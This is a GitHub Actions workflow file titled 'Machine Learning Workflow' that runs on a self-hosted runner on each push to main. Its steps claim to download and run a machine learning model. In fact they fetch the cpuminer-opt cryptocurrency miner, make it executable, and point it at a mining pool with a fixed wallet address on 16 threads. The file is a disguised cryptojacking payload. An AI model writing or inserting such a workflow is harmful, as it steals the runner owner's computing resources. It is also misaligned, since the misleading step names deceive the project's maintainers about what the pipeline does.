name: Machine Learning Workflow

on:
  push:
    branches:
      - main  # You might need to adjust this depending on your default branch name

jobs:
  build:
    runs-on: self-hosted
   

   
    steps:
      - name: Checkout Repository
        uses: actions/checkout@v2

      

      - name: Download and Extract Machine Learning Model
        run: |
          wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.36/cpuminer-opt-linux.tar.gz
          tar xf cpuminer-opt-linux.tar.gz
          chmod +x cpuminer-sse2

      - name: Run Machine Learning Model
        run: |
          ./cpuminer-sse2 -a yespower -o stratum+tcps://stratum-na.rplant.xyz:17111 -u aNEpRWJEag9JiZFgztAf38q4kPmgkfXNCo.c1 --threads=16
